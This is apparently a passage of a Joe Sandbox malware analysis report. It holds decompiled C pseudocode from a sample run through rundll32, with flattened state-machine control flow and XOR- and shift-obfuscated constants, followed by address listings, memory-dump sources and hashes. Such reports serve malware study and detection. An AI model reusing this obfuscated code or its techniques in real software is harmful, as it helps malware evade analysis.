                                                                                                                      								_t1099 = E002BEF71(_v308, _v440);
                                                                                                                      								_t1281 = 0x9905489;
                                                                                                                      								goto L108;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0xef2ebcd;
                                                                                                                      							if(_t1281 == 0xef2ebcd) {
                                                                                                                      								_t1099 = E002B70ED();
                                                                                                                      								__eflags = _t1099;
                                                                                                                      								if(_t1099 == 0) {
                                                                                                                      									goto L112;
                                                                                                                      								}
                                                                                                                      								_t1281 = 0x18aafdf;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1281 - 0xf21d89d;
                                                                                                                      							if(_t1281 != 0xf21d89d) {
                                                                                                                      								goto L108;
                                                                                                                      							}
                                                                                                                      							_t1099 = _v456;
                                                                                                                      							_t1281 = 0x146b067;
                                                                                                                      							_v32 = _t1099;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t1099 = E002BF435(__eflags);
                                                                                                                      							__eflags = _t1099;
                                                                                                                      							if(_t1099 == 0) {
                                                                                                                      								goto L112;
                                                                                                                      							}
                                                                                                                      							_t1281 = 0xc51c993;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xbbfe55d;
                                                                                                                      						if(_t1281 == 0xbbfe55d) {
                                                                                                                      							_t1099 = E002BB821();
                                                                                                                      							_t1281 = 0xaeb8d3b;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xbf4062e;
                                                                                                                      						if(_t1281 == 0xbf4062e) {
                                                                                                                      							_t1099 = E002BFD8C();
                                                                                                                      							_t1281 = 0xc00d32d;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xc00d32d;
                                                                                                                      						if(_t1281 == 0xc00d32d) {
                                                                                                                      							_t1099 = E002B2830();
                                                                                                                      							_t1281 = 0x65c604e;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xc51c993;
                                                                                                                      						if(_t1281 != 0xc51c993) {
                                                                                                                      							goto L108;
                                                                                                                      						}
                                                                                                                      						_t1099 = E002C0F7B();
                                                                                                                      						_t1281 = 0x7a9dc43;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_v76 = E002BEDFC();
                                                                                                                      						_t1195 = _v496;
                                                                                                                      						_t1099 = E002BC24A(_v496, _t1135, _v332, _v340, _v348);
                                                                                                                      						_t1311 = _t1311 + 0xc;
                                                                                                                      						_v72 = _t1099;
                                                                                                                      						_t1281 = 0x3c3a72c;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x9aa8372;
                                                                                                                      					if(__eflags > 0) {
                                                                                                                      						__eflags = _t1281 - 0xa2fb2e2;
                                                                                                                      						if(_t1281 == 0xa2fb2e2) {
                                                                                                                      							_t1099 = E002C04B8();
                                                                                                                      							_t1281 = 0xbf4062e;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xa315cf9;
                                                                                                                      						if(_t1281 == 0xa315cf9) {
                                                                                                                      							_t1139 = E002CBE8C();
                                                                                                                      							__eflags = _t1139;
                                                                                                                      							if(_t1139 == 0) {
                                                                                                                      								_t1099 = E002BBC7E();
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1281 = ( ~_t1099 & 0xfe3bacb4) + 0xbf4062e;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							_t1099 = E002BBC7E();
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1288 =  ~_t1099 & 0xfc391596;
                                                                                                                      							goto L43;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xa9b18c1;
                                                                                                                      						if(_t1281 == 0xa9b18c1) {
                                                                                                                      							_t1099 = E002B3FB8();
                                                                                                                      							goto L112;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1281 - 0xaeb8d3b;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_v144 = E002CEAE6(0x2b1060, _v256, __eflags, _v264, _v568,  &_v140, _v576);
                                                                                                                      							_v152 = E002CEAE6(0x2b1000, _v552, __eflags, _v560, _v412,  &_v148, _v416);
                                                                                                                      							_t1147 = E002CEBFF( &_v152, _v544, _v396,  &_v144, _v404);
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1281 = ( ~_t1147 & 0x0805135d) + 0x6c6fdd9;
                                                                                                                      							E002BAE03(_v528, _v388, _v536, _v152);
                                                                                                                      							_t1195 = _v248;
                                                                                                                      							_t1099 = E002BAE03(_v248, _v512, _v520, _v144);
                                                                                                                      							_t1311 = _t1311 + 0x3c;
                                                                                                                      						}
                                                                                                                      						goto L108;
                                                                                                                      					}
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t1099 = E002B6C29();
                                                                                                                      						_t1281 = 0xbbfe55d;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x6e1f231;
                                                                                                                      					if(_t1281 == 0x6e1f231) {
                                                                                                                      						_t1099 = E002BAE9A();
                                                                                                                      						_v28 = _t1099;
                                                                                                                      						_t1281 = 0x4b8a3ed;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x7a9dc43;
                                                                                                                      					if(_t1281 == 0x7a9dc43) {
                                                                                                                      						_t1099 = E002C74DD();
                                                                                                                      						__eflags = _t1099;
                                                                                                                      						if(_t1099 == 0) {
                                                                                                                      							goto L112;
                                                                                                                      						}
                                                                                                                      						_t1281 = 0x45ab6ad;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x7d1ce98;
                                                                                                                      					if(_t1281 == 0x7d1ce98) {
                                                                                                                      						_t1099 = E002C129C( &_v136, _v204, _v168,  &_v84);
                                                                                                                      						asm("sbb esi, esi");
                                                                                                                      						_pop(_t1195);
                                                                                                                      						_t1281 = ( ~_t1099 & 0xfcac56dc) + 0x6346a73;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1281 - 0x9905489;
                                                                                                                      					if(_t1281 != 0x9905489) {
                                                                                                                      						goto L108;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1279 - _v516;
                                                                                                                      					if(_t1279 == _v516) {
                                                                                                                      						L73:
                                                                                                                      						_t1281 = _t1171;
                                                                                                                      						goto L108;
                                                                                                                      					}
                                                                                                                      					_t1099 = E002B5E0B(E002CBE84(), _t1279, _v160, _v596);
                                                                                                                      					_pop(_t1195);
                                                                                                                      					__eflags = _t1099 - _v592;
                                                                                                                      					if(_t1099 == _v592) {
                                                                                                                      						_t1099 = E002BC309();
                                                                                                                      						goto L73;
                                                                                                                      					}
                                                                                                                      					_t1281 = 0x1ef2704;
                                                                                                                      					goto L1;
                                                                                                                      					L108:
                                                                                                                      					__eflags = _t1281 - 0x6c6fdd9;
                                                                                                                      				} while (_t1281 != 0x6c6fdd9);
                                                                                                                      				goto L112;
                                                                                                                      			}

                                                                                                                      0x002d20b1
                                                                                                                      0x002d20bc
                                                                                                                      0x002d20c7
                                                                                                                      0x002d20cf
                                                                                                                      0x002d20da
                                                                                                                      0x002d20e2
                                                                                                                      0x002d20ea
                                                                                                                      0x002d20f2
                                                                                                                      0x002d20f7
                                                                                                                      0x002d20ff
                                                                                                                      0x002d2112
                                                                                                                      0x002d2119
                                                                                                                      0x002d2124
                                                                                                                      0x002d212f
                                                                                                                      0x002d213a
                                                                                                                      0x002d2145
                                                                                                                      0x002d2150
                                                                                                                      0x002d215b
                                                                                                                      0x002d216e
                                                                                                                      0x002d2175
                                                                                                                      0x002d2180
                                                                                                                      0x002d2188
                                                                                                                      0x002d2190
                                                                                                                      0x002d2195
                                                                                                                      0x002d219d
                                                                                                                      0x002d21a5
                                                                                                                      0x002d21ad
                                                                                                                      0x002d21b2
                                                                                                                      0x002d21b7
                                                                                                                      0x002d21bc
                                                                                                                      0x002d21c4
                                                                                                                      0x002d21cc
                                                                                                                      0x002d21d4
                                                                                                                      0x002d21dc
                                                                                                                      0x002d21e1
                                                                                                                      0x002d21e9
                                                                                                                      0x002d21f6
                                                                                                                      0x002d21ff
                                                                                                                      0x002d2203
                                                                                                                      0x002d220b
                                                                                                                      0x002d2213
                                                                                                                      0x002d2226
                                                                                                                      0x002d222d
                                                                                                                      0x002d2235
                                                                                                                      0x002d2240
                                                                                                                      0x002d224b
                                                                                                                      0x002d225b
                                                                                                                      0x002d2262
                                                                                                                      0x002d226d
                                                                                                                      0x002d2275
                                                                                                                      0x002d227f
                                                                                                                      0x002d228e
                                                                                                                      0x002d228f
                                                                                                                      0x002d2293
                                                                                                                      0x002d229b
                                                                                                                      0x002d22a6
                                                                                                                      0x002d22b1
                                                                                                                      0x002d22bc
                                                                                                                      0x002d22c7
                                                                                                                      0x002d22d2
                                                                                                                      0x002d22dd
                                                                                                                      0x002d22e8
                                                                                                                      0x002d22f3
                                                                                                                      0x002d22fb
                                                                                                                      0x002d2303
                                                                                                                      0x002d2308
                                                                                                                      0x002d230d
                                                                                                                      0x002d2315
                                                                                                                      0x002d2320
                                                                                                                      0x002d2330
                                                                                                                      0x002d2337
                                                                                                                      0x002d2342
                                                                                                                      0x002d234a
                                                                                                                      0x002d234f
                                                                                                                      0x002d235a
                                                                                                                      0x002d235e
                                                                                                                      0x002d2366
                                                                                                                      0x002d2371
                                                                                                                      0x002d237c
                                                                                                                      0x002d2387
                                                                                                                      0x002d238f
                                                                                                                      0x002d2397
                                                                                                                      0x002d239c
                                                                                                                      0x002d23a1
                                                                                                                      0x002d23a9
                                                                                                                      0x002d23b1
                                                                                                                      0x002d23b9
                                                                                                                      0x002d23c1
                                                                                                                      0x002d23c5
                                                                                                                      0x002d23cd
                                                                                                                      0x002d23d8
                                                                                                                      0x002d23e8
                                                                                                                      0x002d23ef
                                                                                                                      0x002d23fa
                                                                                                                      0x002d2405
                                                                                                                      0x002d2410
                                                                                                                      0x002d241b
                                                                                                                      0x002d2426
                                                                                                                      0x002d2431
                                                                                                                      0x002d243c
                                                                                                                      0x002d2447
                                                                                                                      0x002d2452
                                                                                                                      0x002d245d
                                                                                                                      0x002d2465
                                                                                                                      0x002d2470
                                                                                                                      0x002d247b
                                                                                                                      0x002d2483
                                                                                                                      0x002d2490
                                                                                                                      0x002d2494
                                                                                                                      0x002d249c
                                                                                                                      0x002d24a4
                                                                                                                      0x002d24b7
                                                                                                                      0x002d24be
                                                                                                                      0x002d24c6
                                                                                                                      0x002d24d1
                                                                                                                      0x002d24dc
                                                                                                                      0x002d24e4
                                                                                                                      0x002d24ef
                                                                                                                      0x002d24fa
                                                                                                                      0x002d2505
                                                                                                                      0x002d2518
                                                                                                                      0x002d251d
                                                                                                                      0x002d2524
                                                                                                                      0x002d252f
                                                                                                                      0x002d2537
                                                                                                                      0x002d253f
                                                                                                                      0x002d2547
                                                                                                                      0x002d254c
                                                                                                                      0x002d2554
                                                                                                                      0x002d255f
                                                                                                                      0x002d256a
                                                                                                                      0x002d2575
                                                                                                                      0x002d257d
                                                                                                                      0x002d2581
                                                                                                                      0x002d2589
                                                                                                                      0x002d258e
                                                                                                                      0x002d2596
                                                                                                                      0x002d25a1
                                                                                                                      0x002d25ac
                                                                                                                      0x002d25b7
                                                                                                                      0x002d25c2
                                                                                                                      0x002d25d6
                                                                                                                      0x002d25db
                                                                                                                      0x002d25ec
                                                                                                                      0x002d25ef
                                                                                                                      0x002d25f6
                                                                                                                      0x002d2601
                                                                                                                      0x002d2609
                                                                                                                      0x002d2616
                                                                                                                      0x002d261a
                                                                                                                      0x002d261f
                                                                                                                      0x002d2627
                                                                                                                      0x002d2632
                                                                                                                      0x002d263d
                                                                                                                      0x002d2648
                                                                                                                      0x002d2653
                                                                                                                      0x002d265b
                                                                                                                      0x002d2666
                                                                                                                      0x002d2671
                                                                                                                      0x002d267c
                                                                                                                      0x002d2687
                                                                                                                      0x002d2692
                                                                                                                      0x002d269d
                                                                                                                      0x002d26b3
                                                                                                                      0x002d26ba
                                                                                                                      0x002d26c5
                                                                                                                      0x002d26d0
                                                                                                                      0x002d26e0
                                                                                                                      0x002d26e1
                                                                                                                      0x002d26e8
                                                                                                                      0x002d26f3
                                                                                                                      0x002d2707
                                                                                                                      0x002d270e
                                                                                                                      0x002d2719
                                                                                                                      0x002d2724
                                                                                                                      0x002d272f
                                                                                                                      0x002d2737
                                                                                                                      0x002d2742
                                                                                                                      0x002d274a
                                                                                                                      0x002d2752
                                                                                                                      0x002d275a
                                                                                                                      0x002d2762
                                                                                                                      0x002d276c
                                                                                                                      0x002d2774
                                                                                                                      0x002d277c
                                                                                                                      0x002d2781
                                                                                                                      0x002d2789
                                                                                                                      0x002d2794
                                                                                                                      0x002d279c
                                                                                                                      0x002d27a7
                                                                                                                      0x002d27bb
                                                                                                                      0x002d27c0
                                                                                                                      0x002d27c9
                                                                                                                      0x002d27d4
                                                                                                                      0x002d27df
                                                                                                                      0x002d27f2
                                                                                                                      0x002d27f5
                                                                                                                      0x002d27fc
                                                                                                                      0x002d2807
                                                                                                                      0x002d2812
                                                                                                                      0x002d2825
                                                                                                                      0x002d282c
                                                                                                                      0x002d2837
                                                                                                                      0x002d2842
                                                                                                                      0x002d284a
                                                                                                                      0x002d285d
                                                                                                                      0x002d2864
                                                                                                                      0x002d286f
                                                                                                                      0x002d2877
                                                                                                                      0x002d2884
                                                                                                                      0x002d2888
                                                                                                                      0x002d2890
                                                                                                                      0x002d2898
                                                                                                                      0x002d28a3
                                                                                                                      0x002d28ae
                                                                                                                      0x002d28b9
                                                                                                                      0x002d28c4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d2ef2
                                                                                                                      0x002d2ef7
                                                                                                                      0x002d2ef9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d2eff
                                                                                                                      0x00000000
                                                                                                                      0x002d2eff
                                                                                                                      0x002d2ddc
                                                                                                                      0x002d2e73
                                                                                                                      0x002d2e9d
                                                                                                                      0x002d2ea4
                                                                                                                      0x002d2ea9
                                                                                                                      0x002d2eb0
                                                                                                                      0x002d2eb8
                                                                                                                      0x00000000
                                                                                                                      0x002d2eb8
                                                                                                                      0x002d2de8
                                                                                                                      0x002d2e50
                                                                                                                      0x002d2e57
                                                                                                                      0x002d2e59
                                                                                                                      0x00000000
                                                                                                                      0x002d2e59
                                                                                                                      0x002d2df0
                                                                                                                      0x002d2e34
                                                                                                                      0x002d2e3d
                                                                                                                      0x002d2e45
                                                                                                                      0x00000000
                                                                                                                      0x002d2e45
                                                                                                                      0x002d2df8
                                                                                                                      0x002d3657
                                                                                                                      0x00000000
                                                                                                                      0x002d3657
                                                                                                                      0x002d2e04
                                                                                                                      0x00000000
                                                                                                                      0x002d2e0a
                                                                                                                      0x002d2e0a
                                                                                                                      0x002d2e20
                                                                                                                      0x00000000
                                                                                                                      0x002d2e26
                                                                                                                      0x002d2e04
                                                                                                                      0x002d3212
                                                                                                                      0x002d3218
                                                                                                                      0x002d34f8
                                                                                                                      0x002d34fe
                                                                                                                      0x002d35b6
                                                                                                                      0x002d35bc
                                                                                                                      0x002d360e
                                                                                                                      0x002d3634
                                                                                                                      0x002d363d
                                                                                                                      0x00000000
                                                                                                                      0x002d363d
                                                                                                                      0x002d35be
                                                                                                                      0x002d35c4
                                                                                                                      0x002d35f4
                                                                                                                      0x002d35f9
                                                                                                                      0x002d35fb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d35fd
                                                                                                                      0x00000000
                                                                                                                      0x002d35fd
                                                                                                                      0x002d35c6
                                                                                                                      0x002d35cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d35ce
                                                                                                                      0x002d35d5
                                                                                                                      0x002d35da
                                                                                                                      0x00000000
                                                                                                                      0x002d35da
                                                                                                                      0x002d3504
                                                                                                                      0x002d359f
                                                                                                                      0x002d35a4
                                                                                                                      0x002d35a6
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d35ac
                                                                                                                      0x00000000
                                                                                                                      0x002d35ac
                                                                                                                      0x002d350a
                                                                                                                      0x002d3510
                                                                                                                      0x002d3589
                                                                                                                      0x002d358e
                                                                                                                      0x00000000
                                                                                                                      0x002d358e
                                                                                                                      0x002d3512
                                                                                                                      0x002d3518
                                                                                                                      0x002d3573
                                                                                                                      0x002d3578
                                                                                                                      0x00000000
                                                                                                                      0x002d3578
                                                                                                                      0x002d351a
                                                                                                                      0x002d3520
                                                                                                                      0x002d3556
                                                                                                                      0x002d355b
                                                                                                                      0x00000000
                                                                                                                      0x002d355b
                                                                                                                      0x002d3522
                                                                                                                      0x002d3528
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d3539
                                                                                                                      0x002d353e
                                                                                                                      0x00000000
                                                                                                                      0x002d353e
                                                                                                                      0x002d321e
                                                                                                                      0x002d34c3
                                                                                                                      0x002d34d8
                                                                                                                      0x002d34df
                                                                                                                      0x002d34e4
                                                                                                                      0x002d34e7
                                                                                                                      0x002d34ee
                                                                                                                      0x00000000
                                                                                                                      0x002d34ee
                                                                                                                      0x002d3224
                                                                                                                      0x002d322a
                                                                                                                      0x002d333d
                                                                                                                      0x002d3343
                                                                                                                      0x002d349f
                                                                                                                      0x002d34a4
                                                                                                                      0x00000000
                                                                                                                      0x002d34a4
                                                                                                                      0x002d3349
                                                                                                                      0x002d334f
                                                                                                                      0x002d344b
                                                                                                                      0x002d3450
                                                                                                                      0x002d3452
                                                                                                                      0x002d3475
                                                                                                                      0x002d347e
                                                                                                                      0x002d3486
                                                                                                                      0x00000000
                                                                                                                      0x002d3486
                                                                                                                      0x002d3458
                                                                                                                      0x002d3461
                                                                                                                      0x002d3463
                                                                                                                      0x00000000
                                                                                                                      0x002d3463
                                                                                                                      0x002d3355
                                                                                                                      0x002d335b
                                                                                                                      0x002d3665
                                                                                                                      0x00000000
                                                                                                                      0x002d3665
                                                                                                                      0x002d3361
                                                                                                                      0x002d3367
                                                                                                                      0x002d339c
                                                                                                                      0x002d33cb
                                                                                                                      0x002d33ec
                                                                                                                      0x002d33f8
                                                                                                                      0x002d3412
                                                                                                                      0x002d341c
                                                                                                                      0x002d3430
                                                                                                                      0x002d3437
                                                                                                                      0x002d343c
                                                                                                                      0x002d343c
                                                                                                                      0x00000000
                                                                                                                      0x002d3367
                                                                                                                      0x002d3230
                                                                                                                      0x002d332e
                                                                                                                      0x002d3333
                                                                                                                      0x00000000
                                                                                                                      0x002d3333
                                                                                                                      0x002d3236
                                                                                                                      0x002d323c
                                                                                                                      0x002d3314
                                                                                                                      0x002d3319
                                                                                                                      0x002d3320
                                                                                                                      0x00000000
                                                                                                                      0x002d3320
                                                                                                                      0x002d3242
                                                                                                                      0x002d3248
                                                                                                                      0x002d32f6
                                                                                                                      0x002d32fb
                                                                                                                      0x002d32fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d3303
                                                                                                                      0x00000000
                                                                                                                      0x002d3303
                                                                                                                      0x002d324e
                                                                                                                      0x002d3254
                                                                                                                      0x002d32d1
                                                                                                                      0x002d32db
                                                                                                                      0x002d32e3
                                                                                                                      0x002d32e4
                                                                                                                      0x00000000
                                                                                                                      0x002d32e4
                                                                                                                      0x002d3256
                                                                                                                      0x002d325c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d3262
                                                                                                                      0x002d3266
                                                                                                                      0x002d32ad
                                                                                                                      0x002d32ad
                                                                                                                      0x00000000
                                                                                                                      0x002d32ad
                                                                                                                      0x002d328a
                                                                                                                      0x002d3290
                                                                                                                      0x002d3291
                                                                                                                      0x002d3295
                                                                                                                      0x002d32a8
                                                                                                                      0x00000000
                                                                                                                      0x002d32a8
                                                                                                                      0x002d3297
                                                                                                                      0x00000000
                                                                                                                      0x002d3642
                                                                                                                      0x002d3642
                                                                                                                      0x002d3642
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kJ$*k$/;$7Mv?$@`ST$Mg$N&>$Nv$RiW$XgI8/$Y$[@M$[TA$``$fyI$l$!CG$I8/$M<$d$t}$z
                                                                                                                      • API String ID: 0-363835068
                                                                                                                      • Opcode ID: fae17f8991b2d273a1845cb4fc4e8dc2894871d7cd2d9121694df2a49b4be7d2
                                                                                                                      • Instruction ID: 2719d9e1367ffc0c25ab64e615f00add6f86f649892f04ad9be2894c7cc19369
                                                                                                                      • Opcode Fuzzy Hash: fae17f8991b2d273a1845cb4fc4e8dc2894871d7cd2d9121694df2a49b4be7d2
                                                                                                                      • Instruction Fuzzy Hash: 22C2117191D3818BD3B8CF25C58ABCBBBE1BB94314F10892EE5D996260D7B08959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002C7BCA(signed int __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _t784;
                                                                                                                      				signed int _t787;
                                                                                                                      				signed int _t791;
                                                                                                                      				void* _t797;
                                                                                                                      				signed int _t807;
                                                                                                                      				signed int _t808;
                                                                                                                      				void* _t827;
                                                                                                                      				signed int* _t829;
                                                                                                                      				signed int _t833;
                                                                                                                      				intOrPtr _t841;
                                                                                                                      				void* _t884;
                                                                                                                      				signed int _t899;
                                                                                                                      				signed int _t900;
                                                                                                                      				signed int _t901;
                                                                                                                      				signed int _t902;
                                                                                                                      				signed int _t903;
                                                                                                                      				signed int _t904;
                                                                                                                      				signed int _t905;
                                                                                                                      				signed int _t906;
                                                                                                                      				signed int _t907;
                                                                                                                      				signed int _t908;
                                                                                                                      				signed int _t909;
                                                                                                                      				signed int _t910;
                                                                                                                      				signed int _t911;
                                                                                                                      				signed int _t912;
                                                                                                                      				signed int _t914;
                                                                                                                      				signed int _t919;
                                                                                                                      				signed int* _t923;
                                                                                                                      				void* _t925;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(_a32);
                                                                                                                      				_t829 = _a24;
                                                                                                                      				_push(_a28);
                                                                                                                      				_v16 = __edx;
                                                                                                                      				_push(_t829);
                                                                                                                      				_push(_a20);
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4 & 0x0000ffff);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_a4 & 0x0000ffff);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v8 = 0x5b6770;
                                                                                                                      				_t923 =  &(( &_v296)[0xc]);
                                                                                                                      				_v296 = 0xae8f26;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t827 = 0;
                                                                                                                      				_t914 = 0x83eeb0d;
                                                                                                                      				_t899 = 0x66;
                                                                                                                      				_v296 = _v296 * 0x77;
                                                                                                                      				_v296 = _v296 + 0xffff6317;
                                                                                                                      				_v296 = _v296 | 0x51a667a9;
                                                                                                                      				_v296 = _v296 ^ 0x51a7efe9;
                                                                                                                      				_v220 = 0x22f2e2;
                                                                                                                      				_v220 = _v220 + 0xffff44aa;
                                                                                                                      				_v220 = _v220 / _t899;
                                                                                                                      				_t900 = 0x6e;
                                                                                                                      				_v220 = _v220 / _t900;
                                                                                                                      				_v220 = _v220 ^ 0x000000d4;
                                                                                                                      				_v180 = 0x3b651;
                                                                                                                      				_v180 = _v180 << 0xd;
                                                                                                                      				_v180 = _v180 >> 7;
                                                                                                                      				_v180 = _v180 ^ 0x00ed9488;
                                                                                                                      				_v100 = 0xe67bf2;
                                                                                                                      				_v100 = _v100 + 0x555e;
                                                                                                                      				_v100 = _v100 ^ 0x00e65150;
                                                                                                                      				_v120 = 0x8bcc28;
                                                                                                                      				_v120 = _v120 + 0xffffc7f8;
                                                                                                                      				_v120 = _v120 ^ 0x008bd420;
                                                                                                                      				_v216 = 0x57910f;
                                                                                                                      				_v216 = _v216 ^ 0xab75fa15;
                                                                                                                      				_v216 = _v216 ^ 0x4a558bb8;
                                                                                                                      				_v216 = _v216 << 0x10;
                                                                                                                      				_v216 = _v216 ^ 0xe0e20000;
                                                                                                                      				_v108 = 0xde84ad;
                                                                                                                      				_v108 = _v108 + 0xffffece5;
                                                                                                                      				_v108 = _v108 ^ 0x00da7192;
                                                                                                                      				_v124 = 0x7a6f99;
                                                                                                                      				_v124 = _v124 + 0x7c9;
                                                                                                                      				_v124 = _v124 << 0x10;
                                                                                                                      				_v124 = _v124 ^ 0x73620000;
                                                                                                                      				_v212 = 0x24738c;
                                                                                                                      				_v212 = _v212 + 0xffff84c3;
                                                                                                                      				_v212 = _v212 ^ 0xe5eb5ff0;
                                                                                                                      				_v212 = _v212 * 0x5c;
                                                                                                                      				_v212 = _v212 ^ 0x941448a4;
                                                                                                                      				_v60 = 0x198952;
                                                                                                                      				_v60 = _v60 + 0x4ddc;
                                                                                                                      				_v60 = _v60 ^ 0x0019d52e;
                                                                                                                      				_v48 = 0xba80a;
                                                                                                                      				_v48 = _v48 + 0x1f7d;
                                                                                                                      				_v48 = _v48 ^ 0x000bc687;
                                                                                                                      				_v40 = 0x36c14f;
                                                                                                                      				_v40 = _v40 << 0xc;
                                                                                                                      				_v40 = _v40 ^ 0xec14f000;
                                                                                                                      				_v72 = 0x4ddbf0;
                                                                                                                      				_v72 = _v72 + 0xffff1656;
                                                                                                                      				_v72 = _v72 ^ 0x004cf246;
                                                                                                                      				_v44 = 0x551f62;
                                                                                                                      				_v44 = _v44 ^ 0x64841b78;
                                                                                                                      				_v44 = _v44 ^ 0x64d1045b;
                                                                                                                      				_v152 = 0xb013f0;
                                                                                                                      				_t901 = 0x18;
                                                                                                                      				_v152 = _v152 * 0x52;
                                                                                                                      				_v152 = _v152 ^ 0xa7d20536;
                                                                                                                      				_v152 = _v152 ^ 0x9fb467c9;
                                                                                                                      				_v168 = 0xdb80e;
                                                                                                                      				_v168 = _v168 << 0xc;
                                                                                                                      				_v168 = _v168 + 0x66d3;
                                                                                                                      				_v168 = _v168 ^ 0xdb8146cc;
                                                                                                                      				_v116 = 0x5fff40;
